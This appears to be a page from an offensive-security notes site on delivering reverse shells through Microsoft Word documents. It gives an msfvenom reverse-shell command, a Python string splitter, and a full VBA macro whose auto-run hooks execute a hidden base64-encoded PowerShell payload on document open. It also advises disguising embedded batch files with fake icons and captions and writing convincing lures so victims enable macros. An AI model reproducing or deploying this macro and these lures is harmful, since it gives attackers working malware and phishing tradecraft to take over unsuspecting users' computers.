search

Word Macros

Exploits through Microsoft Word is one of the common methods to either command or control a user's system. Word is a powerful application capable of invoking powershell commands through Macros or even executing batch files.

hashtag
Macros

MSFvenom can be used for constructing the payload for a reverse shell to be included within a macro,

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=443 -f hta-psh -e base64

The output has to be split into lines of 50 characters to be able to use it with macro. Instead of doing it manually, the following python code can be used for splitting the lines.

str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQ....."

n = 50

for i in range(0, len(str), n):
	print "Str = Str + " + '"' + str[i:i+n] + '"'

The output of it can be included into a macro as follows,

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad"
    Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewA"
    Str = Str + "kAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA"
    Str = Str + "H0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGk"
    Str = Str + "AcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8Ad"
    Str = Str + "wBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcAB"
    Str = Str + "vAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9A"
    Str = Str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQ"
    Str = Str + "AaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAU"
    Str = Str + "wB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQB"
    Str = Str + "tAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9A"
    Str = Str + "CcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACA"
    Str = Str + "AJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAc"
    Str = Str + "gBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB"
    Str = Str + "5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkA"
    Str = Str + "GUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGU"
    Str = Str + "AbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAe"
    Str = Str + "gBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQB"
    Str = Str + "jAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5A"
    Str = Str + "FMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4"
    Str = Str + "AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAd"
    Str = Str + "AByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBkAG4ATwB"
    Str = Str + "tAE0AQwBBADcAMQAnACcAKwAnACcAVwArADIALwBpAE8AQgBEA"
    Str = Str + "CsAZgBhAFgAOQBIADYASQBWAFUAaABLAEoAOABpAHEANwBmAFU"
    Str = Str + "AZwB7ADEAfQBYAGMASQB6AGwATABSAEEAUwBpAGkAdwBhAEcAV"
    Str = Str + "QBTAEoAeABoAE0AegBDAFoATwBlAGUAegB0AC8AMwA2AFQAVgA"
    Str = Str + "yAGwAVgBlAHQAYwA3AGEAJwAnACsAJwAnAGMAOABTAEkAewAxA"
    Str = Str + "H0AWgBuAHgAdQBOAHYAdgBwAG0AeABFADMAbwBXAEoAJwAnACs"
    Str = Str + "AJwAnADgAdwBUAHcAcwA3ADQAZQAwAFgANAArAGYARwBEAGsAS"
    Str = Str + "QA0AGUAOAB0AEYAYQBrAEgASgBiAHgAdQA1AEoAWABzAGkAeAB"
    Str = Str + "4AGwASQArADcAdQBhADgAaAA0AGIAdwBWAFoAQwBtAHkAbQBaA"
    Str = Str + "FQAWgAyAHQARQB2AE4AbgAxAGQAUwAzADAAZgBlAHoAeABaAEY"
    Str = Str + "ANQBvAFkAYQA0AEUAQQBWADcAUABLAGMARwBCAEoAQQB0AC8AQ"
    Str = Str + "wBxAE0ARgA5AHYASABaADMAWAB5AEoATABTADcAOABGAEgATAB"
    Str = Str + "mAEMAeQAzAEsANQBvAGkAbQBZAHYAcwBhAHMAaABaAFkATwBGA"
    Str = Str + "E0AOABPADkAewAxAH0AewAxAH0ATQBnAHQARgB7ADEAfQBoAFc"
    Str = Str + "ATQBEAFMAVgBjAEUAewAxAH0AOQA5AEUAKwBYAHAAVwBYAGwAV"
    Str = Str + "wBhAFAAdwBJAEUAUQAwAGsAMABkAGcASABIAEsAOABMAE4AcQB"
    Str = Str + "XAGkATABQAHkAUwBvAHcAUAB2ADkAeABzAHMAaQBUAHEAeABmA"
    Str = Str + "EIAWQB3AGgAeABkAEcAeABEAHUAdgBGAEkAWgBlAGcAQgB4ADg"
    Str = Str + "AQwA5AFkAZQBzAFkANwA1AGcAdABtAEIAQwBIAGMANQAzAHMAY"
    Str = Str + "gBIAFAAUABTADkAKwBGAEsAUgBsAFUAUgBHAEUAdQBHAHoANQB"
    Str = Str + "6AE4ATABzAFcAMABmAEIANABHAFkARgA2AGEAUgAvAGUAbABzA"
    Str = Str + "DkAbwBjADAAVABRADgAZgBoAEIANABuAGEAMQB6AFEAUABJADU"
    Str = Str + "AOQB0AGoARwB3AC8AMABnAHMASABCAFQAYQB5AEwATQBwAEgAb"
    Str = Str + "QBCAG4AQgBsAG8ARwA5ADQAbgBuAHoAbQBRAFoAeABCADcAWgA"
    Str = Str + "nACcAKwAnACcAQwBrAHMANQBMADYAUQAwAEwALwB3AGIATQA5A"
    Str = Str + "EkAdAAzAG0AYgBRAHYAVgBkAEoAZQBxADQARQBVAGoAMwB1AHk"
    Str = Str + "AMwBrAEkANgBlAHQAewAxAH0ANgBzAHcATwBLAFUANABVAHgAU"
    Str = Str + "gBOACsASgBpAHkAUQBZAGEAUgBNAEEAUABoACsAUgBRAGcANgB"
    Str = Str + "HAFgALwBtAHQAOQA0AEoAOQBoAHcAWABzAGoARwBOAGQAegBCA"
    Str = Str + "DQATABQAFYAWQBRAEcATABkAHsAMQB9ADAASQBwAEwAKwBoAHc"
    Str = Str + "ATwBPAEwATQAzADgATQAwAGQAKwArAEgAVwBKADQAOQA0AFMAM"
    Str = Str + "wBrADcARgA1AHsAMQB9AGwAMwArAHYAdABYAEsAbQBDAG8AcQA"
    Str = Str + "4AGQAbQBuAEQAMAB0AFIAawB4AEoANABkAEQAYgB3AEkAZgAyA"
    Str = Str + "DcAYgBqAEUAVABlAHAAbgBJAGQATwA4AFQARAA5AGIAMgBIADE"
    Str = Str + "AcwBUAEsAMgBDAHEAZABDAGcAbAAyAEsASQA0AEIASwBXAFIAa"
    Str = Str + "QB0ACsAQwBmAEoASwBZAGIAMgBLADUAagBpAGwAMwBFAEkANQB"
    Str = Str + "RAGoAWgB7ADEAfQB4AFMAYQA2AHcASgBmADkASgBWAFEAMABKA"
    Str = Str + "HQANwAnACcAKwAnACcAQwBzAFcAaABEAFUAQQB7ADEAfQB5AEQ"
    Str = Str + "AaQA4AGsAdABuAGsAcwBCAEoAbwB1AGIAcABlAEEAMwBnAEoAW"
    Str = Str + "ABPAGcAYQBzADYAQgBIAE0ARwBaAGQASgBvAFgAKwArAHoAMAB"
    Str = Str + "hAEEANQBDAFkAbwAyAGkASQBNAGcATAB2AFIAQwBTADEATQBvA"
    Str = Str + "EwAQgBrAFkAVQAnACcAKwAnACcAMgAzAGwAQgA4AFEASwBTAGI"
    Str = Str + "AJwAnACsAJwAnAGkAawBoAFoALwBHAG4AZQBIAFIAWABEAHkAa"
    Str = Str + "wBuAEYAZwBwADQAWgBtADQAbQB2AHcAQQB6AFAAYgBUAEcAdgB"
    Str = Str + "JAEQANwBvAFEAVgBCAEIAUQBEAHUAagBRADIAMgBDAEsASQBSA"
    Str = Str + "EgAbgBtAGgAVABXAHkAcwA3AGcAMwBpAFoAbwBlAEwASgA5AEc"
    Str = Str + "AbwBJAFUAbwBoAGQAYwBEAFMASQAwAFEARABWAGkASQBVAEQAQ"
    Str = Str + "gA1AFIAeABRAGMALwBZADEAewAxAH0ASQBCAFEATgB6AGIAYgA"
    Str = Str + "yAGgAZQBBADAAeQBjAGMAbABvAFUAdQBSAEMAZwBVAGcAVABKA"
    Str = Str + "E8AWQBXAGMAewAxAH0ARQB0AG4AbgBRAHoAUwA0AE8ARQA4AHg"
    Str = Str + "ARQBxAEcAUgB6AFAAbgBJAFIAUQBHADUAVAB4AHYARwBBAFMAb"
    Str = Str + "gAwAFAANQBpAFIAQwBPAHEAUABXAGYAZgBIAGgAZABlAE0AQwB"
    Str = Str + "aAG0AbwAvAFQAdwBFAGgAWgBjAGsAMwBWAFAAWQAvAG8AbgB3A"
    Str = Str + "HYAMABpAEoAOABwAFAARABFAFkAUABnAGMAZwBtAGoANQBiAHE"
    Str = Str + "AeQBqAEEAWAA2AHAASgBoAFoARQArAEYAZQA5AEkAVABZAEUAe"
    Str = Str + "AAxAGoAeQBxAFcAKwBxAEsAbABKAFUAdABLAFcAcwA2AC8ASQB"
    Str = Str + "iACcAJwArACcAJwBrAFgARwBQADEAQwAvAHUAbQBzADIAdwBYA"
    Str = Str + "C8AZgBwACcAJwArACcAJwB1ADQAUwBoAGEAbwBPAG4AdABYAHs"
    Str = Str + "AMQB9ADMAZgBiAGwAYwBmAE8ANABaAFoANQBVAFoARAA0AHoAY"
    Str = Str + "wA5AGoAZQB1AE4AaAAnACcAKwAnACcAKwBYAFMAVQBOAHEARAA"
    Str = Str + "0AFoAaABQAE4ASwBWADkAVAAwAHEAewAxAH0AYwBmAFcAdwA2A"
    Str = Str + "FoAQwBEADAAVgBYAHMAOABhADcANAAnACcAKwAnACcANQBhAEE"
    Str = Str + "AZQB0AGkAVgAxAGQAMQBpADYAdABqAE8AdQBPADQANQA3ADQAU"
    Str = Str + "gBpAEQAOAB1AGMAbQA2AFkANQBxAGYAYgBWAFUAUQBkADEANgB"
    Str = Str + "JACsAeQBPADEASwAxAGEAcQBnAFkATgBzAG0AMwAzAHkAYgBDA"
    Str = Str + "C8ANgBqAFQANQBmAEcAeABTAE4ASABTAEsANwBrAFAANQBDAHA"
    Str = Str + "ARgBkADEAMQArAGEAWgBhAFkAZgBOAEUAVgBwAEwAYwA2AHQAU"
    Str = Str + "QA4AGMAeABXAHcAdgBkACcAJwArACcAJwAzAG8ALwBiAHgAYQB"
    Str = Str + "0AFIAZABhAFUAMABGAEsAWABtAE4AYwB5AG0AeQBtADcARwBxA"
    Str = Str + "HEALwAwAGkAdQBhAHcAcQBmAGEASABEAGIAWABmAGgANwBVAHY"
    Str = Str + "AYgB0AEcAcAB3AGgAcQB0ACcAJwArACcAJwBzAEMAYgBTAGEAO"
    Str = Str + "AB5ACsAMgBEAEgARgBWAGQAUwB3ADYAcQAzAFIAUQBoADIAWgB"
    Str = Str + "GAFQATABaAFAAQQB3AFcAWQBLAHMASgBMAHUAagBGAFUAbABXA"
    Str = Str + "HoAOABZADUAZABkAGsAZgBFAGYAQwB5AGEAcQBIAFgATABKADA"
    Str = Str + "AcQB0AFUAeQAzAGIARAArAGEAaABYAFUARwBMAHoAcwBRAE0Ad"
    Str = Str + "QAxAGUAVAB3AEcANQAwADYAbAB0AFYARwBaAGMAYgBIAGIAWAB"
    Str = Str + "lAFUAaABxAEQANABiAEEANQBHAFoAbQB7ADEAfQB5AGUAaQBlA"
    Str = Str + "FQAawBiAEQAOABvAFIAaABhADEAdABjAGcAQQAyAEMAMQBUAHQ"
    Str = Str + "AegBOAFMALwBxAEwAVgBkAGIANwBNAG8AdQBuAEgAVQBSADIAM"
    Str = Str + "QArAFQATgBaADEAWAA3AE8ATABWADgARgBMADEAdABqAGQAdQA"
    Str = Str + "3ADkARwAxACsAJwAnACsAJwAnADYATwBMAHcAZQA1ADIAUAA2A"
    Str = Str + "DgAdwBaAFYAZwBzAG0AcAA4AGcAMQBOAE0AaAA4AGYAaAA1AFo"
    Str = Str + "AWgBZADcAVgBPAGIASwBNAGkAcQBHAEgAegAvAGsAeQBLAFgAe"
    Str = Str + "ABYAFgAawBXADkATABkAHEAdgBZADcAOABZAEkARQBvAGsAQQB"
    Str = Str + "HAHEAZQBKAGEATwBUAGUAWQAzADAANwB7ADEAfQBjAFkAeQBUA"
    Str = Str + "FMAawBLAFMAawB2ADYAKwB3ACcAJwArACcAJwA3ADIARQBLAEw"
    Str = Str + "AJwAnACsAJwAnAFIARwBhAFoAawBaAGwAaABWAEoAbQBSAFgAM"
    Str = Str + "ABoAEsAdQBIAFEAawBwAEoARwBFAGYAVwB0AG8AUgBZADcAZAB"
    Str = Str + "1AHAATABGAHAANABFADUAVwBPAC8AeQBKAGEAdQB7ADEAfQB5A"
    Str = Str + "GYAZwBKAGUAUgBHAG8AQgBlADYAMgBIAFAANQBJAGwALwBhAG4"
    Str = Str + "AWgBkAEsAVQBPAFoATAB1ADEASQAxAFQAbwBIADMAMwA2AHoAR"
    Str = Str + "wBOAG4AcwBKAFQATwBXAGoATgBwAEUAZwBrADUAaQBtAHMAVwB"
    Str = Str + "tAHcAUgBoAHgAQgBrAHYANABIAHEATwBBADEAdwBLAEUAeQB2A"
    Str = Str + "FEAbgBXAFcANwBqAEIAMgBTAHUAbwBKAEYARABZAGsAdgB5AE8"
    Str = Str + "AMABGAE0AWgBvADgAKwB4AHkAeQAnACcAKwAnACcANwAyAFIAS"
    Str = Str + "QAnACcAKwAnACcAYwBqAGQAZwBCAGEARwBhADQAKwBqAGQANAB"
    Str = Str + "CAEMAVQB2AEEAdwBoAG4AKwBBAFMAVQBvADYAcABQAFAAKwAyA"
    Str = Str + "DUAdQAyAFIAdgBWAHkARwA4AG0AVABsAHEAcQBGAHYAQgAnACc"
    Str = Str + "AKwAnACcAbgAvAHcATgB4AGoAbQB0AC8AcwAvAHMAdQBNAHAAW"
    Str = Str + "AB5AEsAVQBLAHYAMQBsADgAdQBQAEsAdgB4AHYAeABPAEQARQB"
    Str = Str + "TAEkAYwBSAEEAMABvAHUAeABRAG4AagA0AEMAVABVAEsAVABwA"
    Str = Str + "DgAaQB6AE8AYwBZAFEAZwBIADUAeAAwAFIAQwAvAGoAdQA1AEM"
    Str = Str + "AZgAzAGMASgBiAEsAeQA3ADgAZgB3AEcARwBIAEsATABIAGwAQ"
    Str = Str + "QBzAEEAQQBBAHsAMAB9AHsAMAB9ACcAJwApAC0AZgAnACcAPQA"
    Str = Str + "nACcALAAnACcAcgAnACcAKQApACkAKQAsAFsAUwB5AHMAdABlA"
    Str = Str + "G0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8"
    Str = Str + "AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAY"
    Str = Str + "wBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQB"
    Str = Str + "uAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsA"
    Str = Str + "EUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFI"
    Str = Str + "AZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAc"
    Str = Str + "AB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwB"
    Str = Str + "TAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDA"
    Str = Str + "HIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGU"
    Str = Str + "AOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8Ac"
    Str = Str + "wB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQAYQB"
    Str = Str + "yAHQAKAAkAHMAKQA7AA=="

    CreateObject("Wscript.Shell").Run Str
End Sub

The base64 encoded output is split into lines of 50 since macros cannot accomodate more than 256 characters in a variable.

AutoOpen() and Document_Open() are procedures that call our function when the document is opened or an already opened document is reopened, respectively.

hashtag
Batch Files

Batch files can be created and embedded within a word document to run when the document is opened. A base64 encoded reverse shell command can be generated using MSFVenom and included within a batch file.

Then the batch file can be included as an "object" within the work document. The neat thing about objects are, word allows you to choose your own caption and icon to masquerade the malicious content as something important.

In both these cases it is important to remember that it takes convincing to get the user to either enable macros or run an batch file since Windows always prompts the user with a warning before enabling or running the files. Hence, the content/story that encourages the user to open and run the file has to be tailored to be extremely convicing.

PreviousHTANextWindows Library Files

Last updated